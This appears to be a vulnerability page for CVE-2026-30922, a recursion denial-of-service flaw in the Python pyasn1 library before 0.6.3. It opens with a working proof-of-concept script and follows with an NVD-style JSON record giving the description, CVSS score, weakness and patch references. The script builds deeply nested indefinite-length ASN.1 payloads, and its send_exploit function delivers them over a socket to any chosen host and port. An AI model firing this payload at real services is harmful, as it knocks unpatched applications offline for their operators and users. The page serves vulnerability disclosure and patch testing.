CVE-2026-30922

import socket def create_nested_asn1_payload(depth=5000): """ Generate a malicious ASN.1 payload with deeply nested SEQUENCE tags using indefinite length encoding to trigger recursion overflow. CVE-2026-30922 PoC """ # Start with SEQUENCE tag (0x30) with indefinite length (0x80) payload = b'\x30\x80' # Add deeply nested SEQUENCE tags for _ in range(depth): payload += b'\x30\x80' # Close all nested tags with end-of-contents markers (0x80 0x00) for _ in range(depth + 1): payload += b'\x80\x00' return payload def send_exploit(target_host, target_port, depth=5000): """ Send the malicious payload to target service. """ payload = create_nested_asn1_payload(depth) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: sock.connect((target_host, target_port)) sock.send(payload) print(f'[+] Malicious payload sent ({len(payload)} bytes, depth={depth})') except Exception as e: print(f'[-] Error: {e}') finally: sock.close() def test_locally(): """ Test the vulnerability locally using pyasn1 decoder. """ try: from pyasn1.codec.der import decoder payload = create_nested_asn1_payload(2000) print('[+] Testing payload with pyasn1 decoder...') # This should trigger RecursionError result = decoder.decode(payload) print('[-] No error occurred (unexpected)') except RecursionError: print('[+] RecursionError triggered - vulnerability confirmed!') except Exception as e: print(f'[-] Other error: {type(e).__name__}: {e}') if __name__ == '__main__': test_locally()

{"cve": {"id": "CVE-2026-30922", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:18.397", "lastModified": "2026-05-01T17:16:21.950", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue."}, {"lang": "es", "value": "pyasn1 es una biblioteca ASN.1 genérica para Python. Antes de la versión 0.6.3, la biblioteca 'pyasn1' es vulnerable a un ataque de denegación de servicio (DoS) causado por recursión incontrolada al decodificar datos ASN.1 con estructuras profundamente anidadas. Un atacante puede suministrar una carga útil manipulada que contenga miles de etiquetas 'SEQUENCE' ('0x30') o 'SET' ('0x31') anidadas con marcadores de 'Longitud Indefinida' ('0x80'). Esto fuerza al decodificador a llamarse recursivamente hasta que el intérprete de Python falla con un 'RecursionError' o consume toda la memoria disponible (OOM), provocando la caída de la aplicación anfitriona. Esta es una vulnerabilidad distinta de CVE-2026-23490 (que abordó desbordamientos de enteros en la decodificación de OID). La solución para CVE-2026-23490 ('MAX_OID_ARC_CONTINUATION_OCTETS') no mitiga este problema de recursión. La versión 0.6.3 soluciona este problema específico."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pyasn1:pyasn1:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.6.3", "matchCriteriaId": "3F5F876E-E9B5-45D9-AE85-5E3E35AD09D7"}]}]}], "references": [{"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}